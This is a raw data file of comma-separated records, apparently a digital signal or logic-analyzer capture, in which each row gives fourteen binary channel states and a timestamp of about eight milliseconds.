1,1,0,1,0,0,0,0,0,0,0,0,0,0,7.7896040e-03 1,1,0,1,0,0,0,0,0,0,0,0,0,1,7.9145720e-03 0,0,0,1,0,0,0,0,0,0,0,0,0,1,7.9147840e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,1,7.9148040e-03 0,0,1,1,0,0,0,0,0,0,0,1,0,1,7.9148360e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,1,7.9148600e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,1,7.9151640e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,1,7.9151880e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,1,7.9152160e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,1,7.9152400e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,1,7.9152640e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,1,7.9152920e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,1,7.9153160e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,1,7.9153400e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,1,7.9153640e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,1,7.9153880e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9154040e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9154160e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9154400e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9154680e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9154920e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9155160e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9155400e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9155640e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9155880e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9156120e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9156400e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9156920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9157160e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9157400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9157640e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9157880e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9158120e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9158400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9158600e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9158880e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9159120e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9159400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9159640e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9159880e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9160120e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9160400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9160600e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9160880e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9161120e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9161400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9161640e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9161880e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9162120e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9162640e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9162880e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9163120e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9163400e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9163640e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9163880e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9164120e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9164400e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9164640e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9164880e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9165160e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9165400e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9165640e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9165880e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9166120e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9166400e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9166640e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9166920e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9167160e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9167400e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9167640e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9167880e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9168120e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9168400e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9168680e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9168920e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9169160e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9169400e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9169880e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9170160e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9170680e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9170920e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9171400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9171640e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9172160e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9172400e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9172920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9173160e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9173640e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9173880e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9174160e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9174400e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9174640e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9174920e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9175160e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9175400e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9175640e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9175880e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9176120e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9176400e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9176640e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9176920e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9177160e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9177400e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9177640e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9177880e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9178120e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9178400e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9178640e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9178920e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9179160e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9179400e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9179640e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9179880e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9180120e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9180400e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9180640e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9180920e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9181160e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9181400e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9181640e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9181880e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9182120e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9182400e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9182640e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9182920e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9183400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9183640e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9183880e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9184120e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9184400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9184640e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9184920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9185160e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9185400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9185640e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9185880e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9186120e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9186400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9186640e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9186920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9187160e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9187400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9187640e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9187880e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9188120e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9188400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9188640e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9188920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9189160e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9189400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9189640e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9189880e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9190120e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9190400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9190640e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9190920e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9191160e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9191400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9191640e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9191880e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9192120e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9192360e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9192600e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9192880e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9193120e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9193400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9193640e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9193880e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9194120e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9194360e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9194600e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9194880e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9195120e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9195400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9195640e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9195880e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9196120e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9196360e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9196600e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9196880e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9197120e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9197400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9197640e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9197880e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9198120e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9198360e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9198600e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9198880e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9199120e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9199400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9199640e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9199880e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9200120e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9200360e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9200600e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9200880e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9201120e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9201400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9201640e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9201880e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9202120e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9202360e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9202600e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9202880e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9203120e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9203400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9203640e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9203880e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9204120e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9204360e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9204600e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9204880e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9205120e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9205400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9205640e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9205880e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9206120e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9206360e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9206600e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9206880e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9207120e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9207400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9207640e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9207880e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9208120e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9208360e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9208600e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9208880e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9209120e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9209400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9209640e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9209880e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9210120e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9210360e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9210600e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9210880e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9211120e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9211400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9211640e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9211880e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9212120e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9212360e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9212600e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9212880e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9213120e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9213400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9213640e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9213880e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9214120e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9214360e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9214600e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9214880e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9215120e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9215400e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9215640e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9215880e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9216120e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9216360e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9216600e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9216840e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9217080e-03 0,0,1,1,0,0,0,0,0,0,0,0,1,0,7.9217320e-03 0,0,1,1,0,0,0,0,0,0,0,0,0,0,7.9217600e-03 0,0,1,1,0,1,0,0,0,1,0,0,0,0,7.9217640e-03 0,0,1,1,0,1,0,0,0,1,0,0,0,1,8.0464760e-03 1,0,1,1,0,1,0,0,0,1,0,0,0,1,8.0466760e-03 1,0,1,1,0,1,0,0,0,1,0,1,0,1,8.0466960e-03 1,0,1,1,0,1,0,0,0,1,0,0,0,1,8.0467200e-03 1,0,1,1,0,1,0,0,0,1,0,0,1,1,8.0470440e-03 1,0,1,1,0,1,0,0,0,1,0,0,0,1,8.0470680e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,1,8.0470760e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,1,8.0470960e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,1,8.0471160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,1,8.0471400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,1,8.0471680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,1,8.0471960e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,1,8.0472200e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,1,8.0472440e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,1,8.0472680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,1,8.0472920e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0473120e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0473160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0473400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0473680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0473960e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0474200e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0474440e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0474680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0475160e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0475400e-03 1,0,1,1,0,1,0,0,0,1,0,0,0,0,8.0475480e-03 1,0,1,1,0,1,0,0,0,1,0,0,1,0,8.0475960e-03 1,0,1,1,0,1,0,0,0,1,0,0,0,0,8.0476200e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0476280e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0476440e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0476680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0476920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0477160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0477400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0477680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0477960e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0478200e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0478440e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0478680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0478960e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0479160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0479400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0479680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0479960e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0480200e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0480440e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0480680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0480960e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0481160e-03 1,0,1,1,0,1,0,0,0,1,0,0,0,0,8.0481240e-03 1,0,1,1,0,1,0,0,0,1,0,0,1,0,8.0481680e-03 1,0,1,1,0,1,0,0,0,1,0,0,0,0,8.0481960e-03 1,0,1,1,0,1,0,0,0,0,0,0,0,0,8.0482000e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0482040e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0482200e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0482440e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0482680e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0482960e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0483160e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0483400e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0483680e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0483960e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0484200e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0484440e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0484680e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0484960e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0485160e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0485400e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0485960e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0486200e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0486440e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0486680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0486920e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0487160e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0487400e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0487680e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0487960e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0488200e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0488440e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0488680e-03 1,0,1,1,0,1,0,0,0,1,0,0,0,0,8.0488720e-03 1,0,1,1,0,1,0,0,0,1,0,0,1,0,8.0488960e-03 1,0,1,1,0,1,0,0,0,1,0,0,0,0,8.0489160e-03 1,0,1,1,0,1,0,0,0,1,0,0,1,0,8.0489400e-03 1,0,1,1,0,1,0,0,0,1,0,0,0,0,8.0489680e-03 1,0,1,1,0,1,0,0,0,1,0,0,1,0,8.0489960e-03 1,0,1,1,0,1,0,0,0,1,0,0,0,0,8.0490200e-03 1,0,1,1,0,1,0,0,0,1,0,0,1,0,8.0490440e-03 1,0,1,1,0,1,0,0,0,1,0,0,0,0,8.0490680e-03 1,0,1,1,0,1,0,0,0,1,0,0,1,0,8.0490960e-03 1,0,1,1,0,1,0,0,0,1,0,0,0,0,8.0491160e-03 1,0,1,1,0,1,0,0,0,1,0,0,1,0,8.0491720e-03 1,0,1,1,0,1,0,0,0,1,0,0,0,0,8.0491960e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0492040e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0492200e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0492440e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0492680e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0492960e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0493200e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0493480e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0493720e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0493960e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0494200e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0494440e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0494680e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0494960e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0495200e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0495480e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0495720e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0495960e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0496200e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0496440e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0496680e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0496960e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0497200e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0497480e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0497720e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0497960e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0498200e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0498440e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0498680e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0498960e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0499200e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0499480e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0499720e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0499960e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0500200e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0500440e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0500960e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0501200e-03 1,0,1,1,0,1,0,0,0,1,0,0,0,0,8.0501240e-03 1,0,1,1,0,1,0,0,0,1,0,0,1,0,8.0501720e-03 1,0,1,1,0,1,0,0,0,1,0,0,0,0,8.0501960e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0502040e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0502200e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0502440e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0502680e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0502920e-03 1,0,1,1,0,0,0,0,0,0,0,0,1,0,8.0503160e-03 1,0,1,1,0,0,0,0,0,0,0,0,0,0,8.0503400e-03 